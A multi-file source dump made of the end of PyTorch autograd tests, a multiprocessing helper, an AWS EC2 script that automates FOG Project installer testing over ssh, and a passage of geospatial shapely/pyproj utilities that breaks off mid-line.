run_test(3, 3, 5, 5) def test_strided_leaf_grad_layout(self, device): # (1) If leaf is non-overlapping and dense, grad's layout should match its leaf. for fmt_a in (torch.contiguous_format, torch.channels_last): for fmt_b in (torch.contiguous_format, torch.channels_last): a = torch.rand((2, 3, 4, 5), device=device).to(memory_format=fmt_a) b = torch.rand((2, 3, 4, 5), device=device).to(memory_format=fmt_b) a.requires_grad_() b.requires_grad_() # checks (1) for broadcasted gradients a.sum().backward() self.assertEqual(a.grad.stride(), a.stride()) b.sum().backward() self.assertEqual(b.grad.stride(), b.stride()) # checks (1) for non-broadcasted gradients a.grad = None b.grad = None (a * b).sum().backward() self.assertEqual(a.grad.stride(), a.stride()) self.assertEqual(b.grad.stride(), b.stride()) # (2) If leaf isn't dense, checks that grads are rowmajor contiguous. c = torch.empty_strided((2, 2), (4, 2), device=device).copy_(torch.rand((2, 2), device=device)) c.requires_grad_() d = torch.rand((2, 2), device=device) # checks (2) for broadcasted gradients c.sum().backward() self.assertEqual(c.grad.stride(), (2, 1)) # checks (2) for non-broadcasted gradients c.grad = None (c * d).sum().backward() self.assertEqual(c.grad.stride(), (2, 1)) def _test_atleast(self, device, torch_fn): # 0-dim s = torch.tensor(0.5, dtype=torch.double, requires_grad=True) gradcheck(lambda x: torch_fn(x), s) gradgradcheck(lambda x: torch_fn(x), s) # 1-dim a = torch.rand(4, dtype=torch.double, requires_grad=True) gradcheck(lambda x: torch_fn(x), a) gradgradcheck(lambda x: torch_fn(x), a) # 2,3,4-dim b = torch.rand(4, 3, dtype=torch.double, requires_grad=True) c = torch.rand(4, 3, 2, dtype=torch.double, requires_grad=True) d = torch.rand(4, 3, 2, 1, dtype=torch.double, requires_grad=True) input_tuple = (s, a, b, c, d) gradcheck(lambda s, w, x, y, z: torch_fn(s, w, x, y, z), input_tuple) gradgradcheck(lambda s, w, x, y, z: torch_fn(s, w, x, y, z), input_tuple) def test_atleast(self, device): self._test_atleast(device, torch.atleast_1d) self._test_atleast(device, torch.atleast_2d) self._test_atleast(device, torch.atleast_3d) def test_xlogy(self, device): def _tensor_tensor_helper(x, y): gradcheck(lambda x, y: torch.xlogy(x, y), (x, y)) gradgradcheck(lambda x, y: torch.xlogy(x, y), (x, y)) with torch.no_grad(): x = x.clone() x[torch.rand_like(x) > 0.5] = 0 gradcheck(lambda y: torch.xlogy(x, y), (y)) gradgradcheck(lambda y: torch.xlogy(x, y), (y)) shapes = ((4,), (1, 4), (1, 1, 4), (1, 1, 1, 4)) # For broadcastible shapes and scalar. for x_shape, y_shape in permutations(shapes, 2): x = torch.rand(*x_shape, dtype=torch.double, device=device, requires_grad=True) y = torch.rand(*y_shape, dtype=torch.double, device=device, requires_grad=True) _tensor_tensor_helper(x, y) _tensor_tensor_helper(y, x) gradcheck(lambda y: torch.xlogy(0, y), (y)) gradgradcheck(lambda y: torch.xlogy(0, y), (y)) gradcheck(lambda y: torch.xlogy(2, y), (y)) gradgradcheck(lambda y: torch.xlogy(2, y), (y)) gradcheck(lambda y: torch.xlogy(y, 2), (y)) gradgradcheck(lambda y: torch.xlogy(y, 2), (y)) # Different shape x = torch.rand(2, 3, 4, 5, dtype=torch.double, device=device, requires_grad=True) y = torch.rand(4, 5, dtype=torch.double, device=device, requires_grad=True) _tensor_tensor_helper(x, y) _tensor_tensor_helper(y, x) _tensor_tensor_helper(x, x) _tensor_tensor_helper(y, y) # Same shape x = torch.rand(4, 5, dtype=torch.double, device=device, requires_grad=True) y = torch.rand(4, 5, dtype=torch.double, device=device, requires_grad=True) _tensor_tensor_helper(x, y) _tensor_tensor_helper(y, x) _tensor_tensor_helper(x, x) _tensor_tensor_helper(y, y) class TestMultithreadAutograd(TestCase): def _run_py_multithread_fn(self, fn, args=(), num_threads=10, kwargs=None): threads = [] for _ in range(num_threads): p = threading.Thread(target=fn, args=(args)) p.start() threads.append(p) for p in threads: p.join() def test_simple_backward(self): # simple multithreaded backward that create threads in the beginning of training # and everything else is training separately, i.e. inputs, operations, etc. def train_fn(): x = torch.ones(5, 5, requires_grad=True) y = (x + 3) * (x + 4) * 0.5 y.sum().backward() self.assertEqual(x.grad, x + 3.5) self._run_py_multithread_fn(train_fn) def test_simple_backward_same_input(self): # simple multithreaded backward with only shared inputs (i.e. This is common # for things like Hogwild multithreaded training with multiple CPU threads) def train_fn_backward(x): y = (x + 3) * (x + 4) * 0.5 y.sum().backward() x = torch.ones(5, 5, requires_grad=True) self._run_py_multithread_fn(train_fn_backward, (x,)) # Since we are calling backward from multiple threads # and all threads share the same input, when we do backward # concurrently, different backwards will all accumulate to # the same .grad for each input, and the gradients should # be equal to num_threads * gradient self.assertEqual(x.grad, 10 * (x + 3.5)) def train_fn_grad(x): y = (x + 3) * (x + 4) * 0.5 grads = torch.autograd.grad(y.sum(), x) self.assertEqual(len(grads), 1) self.assertEqual(grads[0], x + 3.5) # since we use functional grad() api, gradients will not # be accumulate to the same place and should be the same self._run_py_multithread_fn(train_fn_grad, (x,)) def test_python_thread_in_middle(self): # User might write a network that starts on one CPU thread, then runs its second half # concurrently with other threads (either via python threading or fork/join calls), # then calls backward()/grad() on BOTH threads, like a Y pattern from input at the # bottom to output at the top. This way part of the GraphTask is being shared across # different threads and we need to ensure user specify retain_graph=True, otherwise # error out with the correct error message # Case 1: multiple backward with python threads, retain_graph=False # should throw error in some threads with no retain_graph. success_vs_raises = [0, 0] def train_fn_no_retain_graph(x): y = x + x ** 2 try: y.sum().backward() success_vs_raises[0] += 1 except RuntimeError as error: success_vs_raises[1] += 1 self.assertRegex(str(error), "Specify retain_graph=True") x_no_retain = torch.ones(5, 5, requires_grad=True) y_no_retain = x_no_retain + x_no_retain ** 2 self._run_py_multithread_fn(train_fn_no_retain_graph, (y_no_retain,), num_threads=5) # at least one thread will be success in this case, all other threads should raise # with the error that throw to user to recommend them specify retain_graph=True self.assertTrue(success_vs_raises[0] >= 1) # multiple backward with python threads, no error with retain_graph=True def train_fn_retain_graph(x): y = x + x ** 2 y.sum().backward(retain_graph=True) x_retain = torch.ones(5, 5, requires_grad=True) y_retain = x_retain + x_retain ** 2 self._run_py_multithread_fn(train_fn_retain_graph, (y_retain,), num_threads=5) # result should equal to num_thread * gradients self.assertEqual(x_retain.grad, 5 * (4 * x_retain ** 3 + 6 * (x_retain ** 2) + 4 * x_retain + 1)) def test_fork_join_in_middle(self): # multiple backward with jit threads (fork/join primitive) # similar to test_python_thread_in_middle, we test with retain_graph=False/True # Case 1: multiple grad() calls with jit threads, retain_graph=False # should throw error in some threads with no retain_graph. @torch.jit.script def train_fn_jit_no_retain(middle, orig_x): y = middle + middle ** 2 return torch.autograd.grad([y.sum()], [orig_x]) @torch.jit.script def train_fn_fork_join_calls_no_retain(x): y_no_retain = (x + 3) * (x + 4) * 0.5 fut = torch.jit._fork(train_fn_jit_no_retain, y_no_retain, x) grad_hat = train_fn_jit_no_retain(y_no_retain, x) grad = torch.jit._wait(fut) return grad, grad_hat try: train_fn_fork_join_calls_no_retain(torch.randn(5, 5, requires_grad=True)) except RuntimeError as error: self.assertRegex(str(error), "Specify retain_graph=True") # Case 2: no error with retain_graph=True @torch.jit.script def train_fn_jit_retain(middle, orig_x): y = middle + middle ** 2 return torch.autograd.grad([y.sum()], [orig_x], retain_graph=True) @torch.jit.script def train_fn_fork_join_calls_retain(x): y_retain = (x + 3) * (x + 4) * 0.5 fut1 = torch.jit._fork(train_fn_jit_retain, y_retain, x) fut2 = torch.jit._fork(train_fn_jit_retain, y_retain, x) grad = train_fn_jit_retain(y_retain, x) grad1 = torch.jit._wait(fut1) grad2 = torch.jit._wait(fut2) return grad, grad1, grad2 grad, grad1, grad2 = train_fn_fork_join_calls_retain(torch.randn(5, 5, requires_grad=True)) self.assertEqual(grad, grad1) self.assertEqual(grad, grad2) def test_preserve_backtrace(self): class Foo(torch.autograd.Function): @staticmethod def forward(ctx, input): return input @staticmethod def backward(ctx, *grad): raise ValueError("something") t = torch.rand(10, requires_grad=True) try: Foo.apply(t).sum().backward() except Exception: import traceback tb = sys.exc_info()[2] tb_str = "\n".join(traceback.format_tb(tb)) self.assertTrue('raise ValueError("something")' in tb_str) # TODO(@anjali411): add an OpInfo based test for torch.cat # Issue: https://github.com/pytorch/pytorch/issues/51627 def test_cat_r_to_c(self): inp_c = torch.rand(3, 2, dtype=torch.cdouble, requires_grad=True) inp_r = torch.randn(3, 2, dtype=torch.double, requires_grad=True) def fn(x1, x2): return torch.cat((x1, x2), dim=-1) torch.autograd.gradcheck(fn, [inp_r, inp_c]) torch.autograd.gradcheck(fn, [inp_c, inp_r]) for test in method_tests(): add_test(*test) # e.g., TestAutogradDeviceTypeCPU and TestAutogradDeviceTypeCUDA instantiate_device_type_tests( TestAutogradDeviceType, globals(), except_for=None ) if __name__ == '__main__': run_tests()
multiprocess.py
import multiprocessing def _SpawnProcess(func,args,num_processes): processes = [] for _ in range(num_processes): p = multiprocessing.Process(target=func, args=args) p.start() processes.append(p) return processes def SpawnProcesses(funcs,args,num_processes,join=True): if type(funcs) is list: assert type(args) is list,'Expected args to be list' assert type(num_processes) is list,'Expected num_processes to be list' processes = [] for func,arg,num_process in zip(funcs,args,num_processes): process = _SpawnProcess(func,arg,num_process) processes += process else: #print(args) processes = _SpawnProcess(funcs,args,num_processes) if not join: return processes for process in processes: process.join()
functions.py
import boto3 import time import sys import datetime from settings import * import os from threading import Thread import subprocess cwd = os.path.dirname(os.path.realpath(__file__)) ec2resource = boto3.resource('ec2') ec2client = boto3.client('ec2') def add_ssh_identities(): known_hosts_content = "" subprocess.call("echo '' > ~/.ssh/known_hosts", shell=True) for address in dnsAddresses: # Kick the tires a bit, this helps the remote host to 'wake up', and for a network path to be learned by involved routers. for i in range(0,7): subprocess.call(timeout + " " + sshTime + " " + ssh_keyscan + " -H " + address + " > /dev/null 2>&1", shell=True) time.sleep(wait) time.sleep(wait) subprocess.call(timeout + " " + sshTime + " " + ssh_keyscan + " -H " + address + " >> ~/.ssh/known_hosts 2> /dev/null", shell=True) def read_file(path): if os.path.isfile(path): with open(path, 'r') as content_file: try: return content_file.read() except Exception as e: return e else: return "The file '" + path + "' does not exist." def append_file(path,content): try: with open(path, 'a') as content_file: content_file.write(content) except Exception as e: print "Exception appending to '" + str(path) + "'" print "Exception: " + str(e) def overwrite_file(path,content): try: with open(path, 'w') as content_file: content_file.write(content) except Exception as e: print "Exception overwriting '" + str(path) + "'" print "Exception: " + str(e) def make_dir(directory): if not os.path.exists(directory): os.makedirs(directory) def complete_threads(threads): # Start all the threads. for x in threads: x.start() # Wait for all threads to exit. for x in threads: x.join() def get_instance(name,value): # This assumes one match # Only for instances that are not terminated. response = ec2client.describe_instances( Filters=[ { 'Name': 'tag:' + name, 'Values': [value] }, { 'Name':'instance-state-name', 'Values':['pending','running','shutting-down','stopping','stopped'] } ] ) instance = ec2resource.Instance(response["Reservations"][0]["Instances"][0]["InstanceId"]) return instance def get_instance_volume(instance): # This assumes one volume. try: return ec2resource.Volume(instance.block_device_mappings[0]["Ebs"]["VolumeId"]) except: return None def wait_until_stopped(instance): while True: instance.reload() if instance.state["Name"] == "stopped": break else: time.sleep(wait) return def wait_until_running(instance): while True: instance.reload() if instance.state["Name"] == "running": break else: time.sleep(wait) return def create_snapshot(volume,name_tag): snapshot = volume.create_snapshot() snapshot.create_tags( Tags=[ { 'Key': 'Name', 'Value': name_tag } ] ) snapshot.create_tags(Tags=globalTags) while True: snapshot.reload() if snapshot.state == "completed": break else: time.sleep(wait) return snapshot def delete_snapshots(name,value): # This deletes all matching snapshots. response = ec2client.describe_snapshots( Filters=[ { 'Name': 'tag:' + name, 'Values': [value] } ] ) for snapshotDict in response["Snapshots"]: snapshot = ec2resource.Snapshot(snapshotDict["SnapshotId"]) snapshot.delete() def get_snapshot(name,value): # Assumes one match. response = ec2client.describe_snapshots( Filters=[ { 'Name': 'tag:' + name, 'Values': [value] } ] ) snapshot = ec2resource.Snapshot(response["Snapshots"][0]["SnapshotId"]) return snapshot def restore_clean_snapshots(): threads = [] for OS in OSs: instance = get_instance("Name","fogtesting-" + OS) snapshot = get_snapshot("Name",OS + '-clean') if OS == "debian10": threads.append(Thread(target=restore_snapshot_to_instance,args=(snapshot,instance,"/dev/xvda"))) elif OS == "centos7": threads.append(Thread(target=restore_snapshot_to_instance,args=(snapshot,instance,"/dev/sda1"))) elif OS == "rhel7": threads.append(Thread(target=restore_snapshot_to_instance,args=(snapshot,instance,"/dev/sda1"))) elif OS == "fedora30": threads.append(Thread(target=restore_snapshot_to_instance,args=(snapshot,instance,"/dev/sda1"))) elif OS == "arch": threads.append(Thread(target=restore_snapshot_to_instance,args=(snapshot,instance,"/dev/sda1"))) elif OS == "ubuntu18_04": threads.append(Thread(target=restore_snapshot_to_instance,args=(snapshot,instance,"/dev/sda1"))) else: # Here, just exit because it's better to know something is wrong early than to dig to figure it out why later. print "Don't know how to handle OS: '" + str(OS) + "', exiting." sys.exit(1) complete_threads(threads) def restore_snapshot_to_instance(snapshot,instance,device): """ Stop the instance detach and delete the old volume. Create a new volume Attach the new volume Start the instance """ instance.stop(Force=True) wait_until_stopped(instance) oldVolume = get_instance_volume(instance) if oldVolume is not None: oldVolume.detach_from_instance(Force=True) while True: oldVolume.reload() if oldVolume.state == "available": break else: time.sleep(wait) oldVolume.delete() newVolume = ec2client.create_volume(SnapshotId=snapshot.id,AvailabilityZone=zone,VolumeType='standard') newVolume = ec2resource.Volume(newVolume["VolumeId"]) newVolume.create_tags(Tags=instance.tags) while True: newVolume.reload() if newVolume.state == "available": break else: time.sleep(wait) instance.attach_volume(VolumeId=newVolume.id,Device=device) while True: newVolume.reload() if newVolume.state == "in-use": break else: time.sleep(wait) instance.modify_attribute(BlockDeviceMappings=[{'Ebs': {'DeleteOnTermination': True}, 'DeviceName': device}]) instance.start() wait_until_running(instance) def update_os(branch,OS,now,instance): # Make required directory. make_dir(os.path.join(webdir,OS)) # Write -1 to result file locally to indicate it didn't finish in time. with open(os.path.join(statusDir,OS + "." + branch + ".patch_result"), 'w') as content_file: content_file.write("-1") # Send the update script. command = timeout + " " + sshTime + " " + scp + " -o ConnectTimeout=" + sshTimeout + " " + os.path.join(cwd,'updateOS.sh') + " " + OS + ":/root/updateOS.sh" subprocess.call(command, shell=True) # Get starting time d1 = datetime.datetime.now() # Run the remote update script. command = timeout + " " + patchTimeout + " " + ssh + " -o ConnectTimeout=" + sshTimeout + " " + OS + ' "/root/./updateOS.sh"' subprocess.call(command, shell=True) # Get ending time. d2 = datetime.datetime.now() # Calculate duration. duration = d2 - d1 duration = str(datetime.timedelta(seconds=duration.total_seconds())) # Remove miliseconds, we don't care that much about miliseconds and it takes up realestate on the webpage. duration = duration.split('.')[0] # Write duration to file. with open(os.path.join(statusDir,OS + "." + branch + ".patch_duration"), 'w') as content_file: content_file.write(duration) # Get the patch_result command = timeout + " " + sshTime + " " + scp + " -o ConnectTimeout=" + sshTimeout + " " + OS + ":/root/patch_result " + os.path.join(statusDir,OS + "." + branch + ".patch_result") subprocess.call(command, shell=True) # Get the patch_output command = timeout + " " + sshTime + " " + scp + " -o ConnectTimeout=" + sshTimeout + " " + OS + ":/root/patch_output.log " + os.path.join(webdir,OS,now + "_patch_output.log") subprocess.call(command, shell=True) # Reboot. command = timeout + " " + patchTimeout + " " + ssh + " -o ConnectTimeout=" + sshTimeout + " " + OS + ' "( sleep 5;reboot ) & " > /dev/null 2>&1' subprocess.call(command, shell=True) # Wait for the reboot to complete before proceeding. time.sleep(bootTime) def runTest(branch,OS,now,instance): make_dir(os.path.join(webdir,OS)) commandsLog = os.path.join(statusDir,OS + "." + branch + ".remote_commands") if os.path.isfile(commandsLog): os.remove(commandsLog) # Write -1 locally to indicate it didn't finish in time. with open(os.path.join(statusDir,OS + "." + branch + ".result"), 'w') as content_file: content_file.write("-1") # print "Kickin tires" # Kick the tires a bit, this helps the remote host to 'wake up', and for a network path to be learned by involved routers. command = timeout + " " + sshTime + " " + ssh + " -o ConnectTimeout=" + sshTimeout + " " + OS + ' "echo wakeup" > /dev/null 2>&1' append_file(commandsLog,command + "\n") subprocess.call(command, shell=True) command = timeout + " " + sshTime + " " + ssh + " -o ConnectTimeout=" + sshTimeout + " " + OS + ' "echo get ready" > /dev/null 2>&1' append_file(commandsLog,command + "\n") subprocess.call(command, shell=True) # print "Scp script to remote box" # Scp a script onto the remote box that we will later call. command = timeout + " " + sshTime + " " + scp + " -o ConnectTimeout=" + sshTimeout + " " + os.path.join(cwd,'installBranch.sh') + " " + OS + ":/root/installBranch.sh" append_file(commandsLog,command + "\n") subprocess.call(command, shell=True) # Get starting time d1 = datetime.datetime.now() # print "Starting installer" # Start the fog installer. command = timeout + " " + fogTimeout + " " + ssh + " -o ConnectTimeout=" + sshTimeout + " " + OS + ' "/root/./installBranch.sh ' + branch + '"' append_file(commandsLog,command + "\n") subprocess.call(command, shell=True) # Get ending time. d2 = datetime.datetime.now() # Calculate duration. duration = d2 - d1 duration = str(datetime.timedelta(seconds=duration.total_seconds())) # Remove miliseconds, we don't care that much about miliseconds and it takes up realestate on the webpage. duration = duration.split('.')[0] # Write duration to file. with open(os.path.join(statusDir,OS + "." + branch + ".duration"), 'w') as content_file: content_file.write(duration) # print "Getting result file" # Get the result file. command = timeout + " " + sshTime + " " + scp + " -o ConnectTimeout=" + sshTimeout + " " + OS + ":/root/result " + os.path.join(statusDir,OS + "." + branch + ".result") append_file(commandsLog,command + "\n") subprocess.call(command, shell=True) # This should send the result code of the attempt to something like /tmp/debian9.master.result # print "Getting output file" # Get the output file. command = timeout + " " + sshTime + " " + scp + " -o ConnectTimeout=" + sshTimeout + " " + OS + ":/root/output " + os.path.join(webdir,OS,now + "_output.log") append_file(commandsLog,command + "\n") subprocess.call(command, shell=True) # print "Getting fog log file" # Get the fog log. command = timeout + " " + sshTime + " " + scp + " -o ConnectTimeout=" + sshTimeout + " " + OS + ":/root/git/fogproject/bin/error_logs/fog_error* " + os.path.join(webdir,OS,now + "_fog_error.log") append_file(commandsLog,command + "\n") subprocess.call(command, shell=True) # print "Getting apache logs" # Get the apache error logs. Can be in only two places. command = timeout + " " + sshTime + " " + scp + " -o ConnectTimeout=" + sshTimeout + " " + OS + ":/var/log/httpd/error_log " + os.path.join(webdir,OS,now + "_apache.log") + " > /dev/null 2>&1" append_file(commandsLog,command + "\n") subprocess.call(command, shell=True) command = timeout + " " + sshTime + " " + scp + " -o ConnectTimeout=" + sshTimeout + " " + OS + ":/var/log/apache2/error.log " + os.path.join(webdir,OS,now + "_apache.log") + " > /dev/null 2>&1" append_file(commandsLog,command + "\n") subprocess.call(command, shell=True) # print "Getting php-fpm logs" # Get php-fpm logs. Can be in several places... command = timeout + " " + sshTime + " " + scp + " -o ConnectTimeout=" + sshTimeout + " " + OS + ":/var/log/php-fpm/www-error.log " + os.path.join(webdir,OS,now + "_php-fpm.log") + " > /dev/null 2>&1" append_file(commandsLog,command + "\n") subprocess.call(command, shell=True) command = timeout + " " + sshTime + " " + scp + " -o ConnectTimeout=" + sshTimeout + " " + OS + ":/var/log/php-fpm/error.log " + os.path.join(webdir,OS,now + "_php-fpm.log") + " > /dev/null 2>&1" append_file(commandsLog,command + "\n") subprocess.call(command, shell=True) command = timeout + " " + sshTime + " " + scp + " -o ConnectTimeout=" + sshTimeout + " " + OS + ":/var/log/php*-fpm.log " + os.path.join(webdir,OS,now + "_php-fpm.log") + " > /dev/null 2>&1" append_file(commandsLog,command + "\n") subprocess.call(command, shell=True) command = timeout + " " + sshTime + " " + scp + " -o ConnectTimeout=" + sshTimeout + " " + OS + ":/var/log/php-fpm/php-fpm.log " + os.path.join(webdir,OS,now + "_php-fpm.log") + " > /dev/null 2>&1" append_file(commandsLog,command + "\n") subprocess.call(command, shell=True) # print "Getting commit" # Get the commit the remote node was using, just as a sainity check. command = timeout + " " + sshTime + " " + ssh + " -o ConnectTimeout=" + sshTimeout + " " + OS + ' "cd /root/git/fogproject;git rev-parse HEAD > /root/commit"' append_file(commandsLog,command + "\n") subprocess.call(command, shell=True) command = timeout + " " + sshTime + " " + scp + " -o ConnectTimeout=" + sshTimeout + " " + OS + ":/root/commit " + os.path.join(statusDir,OS + "." + branch + ".commit") append_file(commandsLog,command + "\n") subprocess.call(command, shell=True) # This should send just the commit that was used in the test to something like /tmp/debian9.master.commit # Kill the instance. instance.stop(Force=True) # print "Reading commit" # Read the commit. commit = read_file(os.path.join(statusDir,OS + "." + branch + ".commit")) # print "Rebuilding log" # Rebuild the log file to have information at the top of it. log = "Date=" + now + "\n" log = log + "Branch=" + branch + "\n" log = log + "Commit=" + commit # The commit comes back with a line feed in it. log = log + "OS=" + OS + "\n" log = log + "##### Begin Log #####\n" log = log + read_file(os.path.join(webdir,OS,now + "_fog_error.log")) # print "Writing log" # Write the new log. with open(os.path.join(webdir,OS,now + "_fog_error.log"), 'w') as content_file: content_file.write(log)
spatial.py
import bottle #import os import sys import requests import json import pyproj import traceback import math #from datetime import datetime from multiprocessing import Process, Pipe from shapely.geometry import shape,MultiPoint,Point,mapping from shapely.geometry.polygon import Polygon from shapely.geometry.multipolygon import MultiPolygon from shapely.geometry.collection import GeometryCollection from shapely.geometry.base import BaseGeometry from shapely import ops from functools import partial from . import settings from . import kmi proj_aea = lambda geometry: pyproj.Proj("+proj=aea +lat_1=-17.5 +lat_2=-31.5 +lat_0=0 +lon_0=121 +x_0=5000000 +y_0=10000000 +ellps=GRS80 +towgs84=0,0,0,0,0,0,0 +units=m +no_defs") def exportGeojson(feat,fname): if isinstance(feat,BaseGeometry): geojson = { "type":"FeatureCollection", "features":[ { "type":"Feature", "geometry":mapping(feat), "properties":{} } ] } elif isinstance(feat,tuple): geojson = { "type":"FeatureCollection", "features":[ { "type":"Feature", "geometry":mapping(feat[0]), "properties":feat[1] or {} } ] } elif isinstance(feat,list): features = [] geojson = { "type":"FeatureCollection", "features":features } for f in feat: if isinstance(f,BaseGeometry): features.append({ "type":"Feature", "geometry":mapping(f), "properties":{} }) elif isinstance(f,tuple): features.append({ "type":"Feature", "geometry":mapping(f[0]), "properties":f[1] or {} }) else: raise Exception("Unsupported type({}.{})".format(f.__class__.__module__,f.__class__.__name__)) else: raise Exception("Unsupported type({}.{})".format(feat.__class__.__module__,feat.__class__.__name__)) with open(fname,'w') as f: f.write(json.dumps(geojson,indent=True)) return fname proj_wgs84 = pyproj.Proj(init='epsg:4326') def buffer(lon, lat, meters,resolution=16): """ Create a buffer around a point """ # Azimuthal equidistant projection aeqd_proj = '+proj=aeqd +lat_0={} +lon_0={} +x_0=0 +y_0=0' project = partial( pyproj.transform, pyproj.Proj(aeqd_proj.format(lat, lon)), proj_wgs84) buf = Point(0, 0).buffer(meters,resolution=resolution) # distance in metres return ops.transform(project, buf).exterior.coords[:] def getShapelyGeometry(feature): if not feature["geometry"]: return None elif feature["geometry"]["type"] == "GeometryCollection": return GeometryCollection([shape(g) for g in feature["geometry"]["geometries"]]) else: return shape(feature["geometry"]) def transform(geometry,src_proj="EPSG:4326",target_proj='aea'): if src_proj == target_proj: return geometry else: if src_proj == 'aea': src_proj = proj_aea(geometry) else: src_proj = pyproj.Proj(init=src_proj) if target_proj == 'aea': target_proj = proj_aea(geometry) else: target_proj = pyproj.Proj(init=target_proj) return ops.transform( partial( pyproj.transform, src_proj, #pyproj.Proj(proj="aea",lat1=geometry.bounds[1],lat2=geometry.bounds[3]) #use projection 'Albers Equal Conic Area for WA' to calcuate the area target_proj ), geometry ) def getGeometryArea(geometry,unit,src_proj="EPSG:4326"): """ Get polygon's area using albers equal conic area """ if src_proj == 'aea': geometry_aea = geometry else: geometry_aea = ops.transform( partial( pyproj.transform, pyproj.Proj(init=src_proj), #pyproj.Proj(proj="aea",lat1=geometry.bounds[1],lat2=geometry.bounds[3]) #use projection 'Albers Equal Conic Area for WA' to calcuate the area proj_aea(geometry) ), geometry ) data = geometry_aea.area if unit == "ha" : return data / 10000.00 elif unit == "km2": return data / 1000000.00 else: return data degrees2radians = math.pi / 180 radians2degrees = 180 /math.pi def getBearing(p1,p2): lon1 = degrees2radians * p1.x lon2 = degrees2radians * p2.x lat1 = degrees2radians * p1.y lat2 = degrees2radians * p2.y a = math.sin(lon2 - lon1) * math.cos(lat2) b = math.cos(lat1) * math.sin(lat2) - math.sin(lat1) * math.cos(lat2) * math.cos(lon2 - lon1); bearing = radians2degrees * math.atan2(a, b); return bearing if bearing >= 0 else bearing + 360 directions = { 4:[360/4,math.floor(360 / 8 * 100) / 100,["N","E","S","W"]], 8:[360/8,math.floor(360 / 16 * 100) / 100,["N","NE","E","SE","S","SW","W","NW"]], 16:[360/16,math.floor(360 / 32 * 100) / 100,["N","NNE","NE","ENE","E","ESE","SE","SSE","S","SSW","SW","WSW","W","WNW","NW","NNW"]], 32:[360/32,math.floor(360 / 64 * 100) / 100,["N","NbE","NNE","NEbN","NE","NEbE","ENE","EbN","E","EbS","ESE","SEbE","SE","SEbS","SSE","SbE","S","SbW","SSW","SWbS","SW","SWbW","WSW","WbS","W","WbN","WNW","NWbW","NW","NWbN","NNW","NbW"]], } def getDirection(bearing,mode = 16): mode = mode or 16 if mode not in directions: mode = 16 index = int((math.floor(bearing / directions[mode][0]) + 0 if ((round(bearing % directions[mode][0],2) <= directions[mode][1])) else 1) % mode) return directions[mode][2][index] def getDistance(p1,p2,unit="m",p1_proj="EPSG:4326",p2_proj="EPSG:4326"): if p1_proj == 'aea': p1_aea = p1 else: p1_aea = ops.transform( partial( pyproj.transform, pyproj.Proj(init=p1_proj), #pyproj.Proj(proj="aea",lat1=geometry.bounds[1],lat2=geometry.bounds[3]) #use projection 'Albers Equal Conic Area for WA' to calcuate the area proj_aea(p1) ), p1 ) if p2_proj == 'aea': p2_aea = p2 else: p2_aea = ops.transform( partial( pyproj.transform, pyproj.Proj(init=p2_proj), #pyproj.Proj(proj="aea",lat1=geometry.bounds[1],lat2=geometry.bounds[3]) #use projection 'Albers Equal Conic Area for WA' to calcuate the area proj_aea(p2) ), p2 ) data = p1_aea.distance(p2_aea) if unit == "km" : return data / 1000.00 else: return data #return polygon or multipolygons if have, otherwise return None def extractPolygons(geom): if not geom: return None elif isinstance(geom,Polygon) or isinstance(geom,MultiPolygon): return geom elif isinstance(geom,GeometryCollection): result = None for g in geom: p = extractPolygons(g) if not p: continue elif not result: result = p elif isinstance(result,MultiPolygon): result = [geom1 for geom1 in result.geoms] if isinstance(p,Polygon): result.append(p) result = MultiPolygon(result) else: for geom1 in p.geoms: result.append(geom1) result = MultiPolygon(result) else: if isinstance(p,Polygon): result = MultiPolygon([result,p]) else: result = [result] for geom1 in p.geoms: result.append(geom1) result = MultiPolygon(result) return result else: return None def extractPoints(geom): if isinstance(geom,Point) or isinstance(geom,MultiPoint): return geom elif isinstance(geom,GeometryCollection): result = None for g in geom: p = extractPoints(g) if not p: continue elif not result: result = p elif isinstance(result,MultiPoint): result = [geom1 for geom1 in result.geoms] if isinstance(p,Point): result.append(p) result = MultiPoint(result) else: for geom1 in p.geoms: result.append(geom1) result = MultiPoint(result) else: if isinstance(p,Point): result = MultiPoint([result,p]) else: result = [result] for geom1 in p.geoms: result.append(geom1) result = MultiPoint(result) return result else: return None def retrieveFeatures(url,session_cookies): res = requests.get(url,verify=False,cookies=session_cookies) res.raise_for_status() return res.json() def checkOverlap(session_cookies,feature,options,logfile): # needs gdal 1.10+ layers = options["layers"] geometry = extractPolygons(getShapelyGeometry(feature)) if not geometry : return features = {} #retrieve all related features from layers for layer in layers: if layer.get('cqlfilter'): layer_url="{}/wfs?service=wfs&version=2.0&request=GetFeature&typeNames={}&outputFormat=json&cql_filter=BBOX({},{},{},{},{}) AND {}".format(layer["kmiservice"],layer["layerid"],layerdefinition(layer)["geometry_property"]["name"],geometry.bounds[1],geometry.bounds[0],geometry.bounds[3],geometry.bounds[2],layer['cqlfilter']) else: layer_url="{}/wfs?service=wfs&version=2.0&request=GetFeature&typeNames={}&outputFormat=json&bbox={},{},{},{}".format(layer["kmiservice"],layer["layerid"],geometry.bounds[1],geometry.bounds[0],geometry.bounds[3],geometry.bounds[2]) features[layer["id"]] = retrieveFeatures(layer_url, session_cookies)["features"] for layer_feature in features[layer["id"]]: layer_geometry = getShapelyGeometry(layer_feature) layer_feature["geometry"] = layer_geometry #check whether the features from different layers are overlap or not layergroup_index1 = 0 while layergroup_index1 < len(layers) - 1: layer1 = layers[layergroup_index1] layergroup_index1 += 1 layer_features1 = features[layer1["id"]] #check whether layer's features are overlap or not. feature_index1 = 0 while feature_index1 < len(layer_features1): feature1 = layer_features1[feature_index1] feature_index1 += 1 feature_geometry1 = feature1["geometry"] if not isinstance(feature_geometry1,Polygon) and not isinstance(feature_geometry1,MultiPolygon): continue layergroup_index2 = layergroup_index1 while layergroup_index2 < len(layers): layer2 = layers[layergroup_index2] layergroup_index2 += 1 layer_features2 = features[layer2["id"]] feature_index2 = 0 while feature_index2 < len(layer_features2): feature2 = layer_features2[feature_index2] feature_index2 += 1 feature_geometry2 = feature2["geometry"] feature_geometry1 = feature1["geometry"] if not isinstance(feature_geometry2,Polygon) and not isinstance(feature_geometry2,MultiPolygon): continue intersections = extractPolygons(feature_geometry1.intersection(feature_geometry2)) if not intersections: continue layer1_pk = layer1.get("primary_key") layer2_pk = layer2.get("primary_key") if layer1_pk: if isinstance(layer1_pk,basestring): feat1 = "{}({}={})".format(layer1["layerid"],layer1_pk,feature1["properties"][layer1_pk]) else: feat1 = "{}({})".format(layer1["layerid"],", ".join(["{}={}".format(k,v) for k,v in feature1["properties"].iteritems() if k in layer1_pk ])) else: feat1 = "{}({})".format(layer1["layerid"],json.dumps(feature1["properties"])) if layer2_pk: if isinstance(layer2_pk,basestring): feat2 = 